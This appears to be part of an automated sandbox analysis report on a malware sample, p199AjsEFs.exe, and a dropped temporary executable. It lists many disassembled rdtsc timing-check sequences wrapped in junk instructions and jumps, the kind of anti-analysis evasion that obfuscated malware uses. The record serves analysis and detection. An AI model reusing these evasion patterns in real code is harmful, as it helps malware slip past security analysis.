Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90BA5 second address: 4C90BC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90BC1 second address: 4C90BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E9719Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90BD3 second address: 4C90C2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FA3F4513F37h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov si, 07CBh 0x00000015 pushfd 0x00000016 jmp 00007FA3F4513F30h 0x0000001b add si, FED8h 0x00000020 jmp 00007FA3F4513F2Bh 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, ecx 0x00000028 pushad 0x00000029 mov ah, B3h 0x0000002b popad 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 movsx edx, si 0x00000033 mov bx, ax 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90C2D second address: 4C90C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E971A8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90C49 second address: 4C90C4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90CA3 second address: 4C90CA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90CA9 second address: 4C90CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90CAD second address: 4C90CDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA3F4E971A0h 0x00000012 adc si, D2B8h 0x00000017 jmp 00007FA3F4E9719Bh 0x0000001c popfd 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0CFE second address: 4CA0D1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA3F4513F2Ch 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0D1B second address: 4CA0D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0D38 second address: 4CA0DC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA3F4513F37h 0x00000009 and cl, FFFFFFDEh 0x0000000c jmp 00007FA3F4513F39h 0x00000011 popfd 0x00000012 mov ebx, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a mov ebx, 4DA9383Eh 0x0000001f pushfd 0x00000020 jmp 00007FA3F4513F2Fh 0x00000025 add ch, FFFFFFEEh 0x00000028 jmp 00007FA3F4513F39h 0x0000002d popfd 0x0000002e popad 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FA3F4513F33h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0DC6 second address: 4CA0DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0DCA second address: 4CA0DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0DD0 second address: 4CA0DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E9719Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0DDF second address: 4CA0DE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0DE3 second address: 4CA0DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b mov cx, dx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0DF3 second address: 4CA0E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushfd 0x00000007 jmp 00007FA3F4513F36h 0x0000000c sub ecx, 42EB2928h 0x00000012 jmp 00007FA3F4513F2Bh 0x00000017 popfd 0x00000018 pop esi 0x00000019 popad 0x0000001a call 00007FA4661C8C74h 0x0000001f push 76952B70h 0x00000024 push dword ptr fs:[00000000h] 0x0000002b mov eax, dword ptr [esp+10h] 0x0000002f mov dword ptr [esp+10h], ebp 0x00000033 lea ebp, dword ptr [esp+10h] 0x00000037 sub esp, eax 0x00000039 push ebx 0x0000003a push esi 0x0000003b push edi 0x0000003c mov eax, dword ptr [769B4538h] 0x00000041 xor dword ptr [ebp-04h], eax 0x00000044 xor eax, ebp 0x00000046 push eax 0x00000047 mov dword ptr [ebp-18h], esp 0x0000004a push dword ptr [ebp-08h] 0x0000004d mov eax, dword ptr [ebp-04h] 0x00000050 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000057 mov dword ptr [ebp-08h], eax 0x0000005a lea eax, dword ptr [ebp-10h] 0x0000005d mov dword ptr fs:[00000000h], eax 0x00000063 ret 0x00000064 pushad 0x00000065 call 00007FA3F4513F35h 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0E83 second address: 4CA0EA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0EA0 second address: 4CA0F15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushfd 0x00000007 jmp 00007FA3F4513F33h 0x0000000c and ecx, 799A233Eh 0x00000012 jmp 00007FA3F4513F39h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test al, al 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push edi 0x00000021 pop ecx 0x00000022 pushfd 0x00000023 jmp 00007FA3F4513F2Fh 0x00000028 sub ecx, 16EDE54Eh 0x0000002e jmp 00007FA3F4513F39h 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB09D0 second address: 4CB0A13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E9719Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, si 0x0000000e pushfd 0x0000000f jmp 00007FA3F4E971A0h 0x00000014 or esi, 1B246B38h 0x0000001a jmp 00007FA3F4E9719Bh 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0A13 second address: 4CB0A25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0A25 second address: 4CB0A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E9719Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0A37 second address: 4CB0A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA3F4513F39h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0A5D second address: 4CB0A63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0A63 second address: 4CB0AE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA3F4513F2Ah 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FA3F4513F2Bh 0x0000000f xor al, 0000006Eh 0x00000012 jmp 00007FA3F4513F39h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e call 00007FA3F4513F2Ch 0x00000023 call 00007FA3F4513F32h 0x00000028 pop ecx 0x00000029 pop ebx 0x0000002a push ecx 0x0000002b mov edx, 4B4492E2h 0x00000030 pop ebx 0x00000031 popad 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 mov cx, 60EBh 0x00000038 mov edx, eax 0x0000003a popad 0x0000003b push eax 0x0000003c jmp 00007FA3F4513F2Dh 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0AE6 second address: 4CB0AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0AEA second address: 4CB0AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0AF0 second address: 4CB0B21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 8EA7h 0x00000007 mov cx, 6E43h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, dword ptr [ebp+0Ch] 0x00000011 jmp 00007FA3F4E971A6h 0x00000016 test esi, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov bl, 6Bh 0x0000001d mov edx, esi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0B21 second address: 4CB0B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 45E4h 0x00000007 mov edi, 532BDC50h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FA4661B17ADh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA3F4513F32h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0B4A second address: 4CB0B5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E9719Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0B5C second address: 4CB0B86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [769B459Ch], 05h 0x0000000f pushad 0x00000010 pushad 0x00000011 mov eax, 7017E755h 0x00000016 popad 0x00000017 popad 0x00000018 je 00007FA4661C9849h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FA3F4513F2Ah 0x00000025 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0B86 second address: 4CB0BA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA3F4E971A0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0BA6 second address: 4CB0BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 57FA09 second address: 57FA24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA3F4E9719Dh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 57FA24 second address: 57FA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4513F39h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 57FA41 second address: 57FA45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EF200 second address: 6EF206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EF206 second address: 6EF20D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EF20D second address: 6EF215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EF215 second address: 6EF21B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6E59CE second address: 6E59E6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA3F4513F32h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6E59E6 second address: 6E59EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EE662 second address: 6EE666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EE7CA second address: 6EE7DC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA3F4E97196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FA3F4E97196h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EE7DC second address: 6EE7E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EE7E0 second address: 6EE7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EE7EA second address: 6EE7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6F1A0A second address: 6F1AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push esi 0x00000009 jmp 00007FA3F4E971A6h 0x0000000e pop esi 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push ebx 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop ebx 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d jmp 00007FA3F4E971A7h 0x00000022 jmp 00007FA3F4E9719Bh 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c jmp 00007FA3F4E971A2h 0x00000031 pop eax 0x00000032 mov edi, 531E36AEh 0x00000037 push 00000003h 0x00000039 mov esi, ebx 0x0000003b push 00000000h 0x0000003d jnp 00007FA3F4E97199h 0x00000043 mov dx, si 0x00000046 push 00000003h 0x00000048 mov dword ptr [ebp+122D2A84h], ecx 0x0000004e sbb si, 05B1h 0x00000053 call 00007FA3F4E97199h 0x00000058 je 00007FA3F4E971B3h 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FA3F4E971A5h 0x00000065 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6F1AB9 second address: 6F1AF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FA3F4513F38h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA3F4513F38h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6F1AF6 second address: 6F1B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FA3F4E9719Ch 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6F1B22 second address: 6F1B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6F1B27 second address: 6F1B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push ecx 0x0000000e jo 00007FA3F4E9719Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6F1D2F second address: 6F1D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 711D19 second address: 711D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6DD55A second address: 6DD5A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FA3F4513F30h 0x00000008 jl 00007FA3F4513F26h 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jns 00007FA3F4513F2Eh 0x00000018 pushad 0x00000019 jns 00007FA3F4513F26h 0x0000001f push edx 0x00000020 pop edx 0x00000021 popad 0x00000022 push ecx 0x00000023 jo 00007FA3F4513F26h 0x00000029 jnp 00007FA3F4513F26h 0x0000002f pop ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 pop eax 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 70FC86 second address: 70FC9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA3F4E971A0h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 70FF76 second address: 70FF7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7100E6 second address: 7100FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7100FD second address: 710103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 710103 second address: 710109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 710109 second address: 71010D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71010D second address: 710111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6DD53E second address: 6DD55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4513F38h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 710516 second address: 71051A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71051A second address: 710535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3F4513F35h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 710535 second address: 71054F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E971A4h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7106C5 second address: 7106D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FA3F4513F26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7106D1 second address: 7106D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71095E second address: 710963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 710963 second address: 71096D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71096D second address: 710979 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 710979 second address: 71097D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71097D second address: 710981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 710F02 second address: 710F16 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA3F4E97196h 0x00000008 jc 00007FA3F4E97196h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71146D second address: 711473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
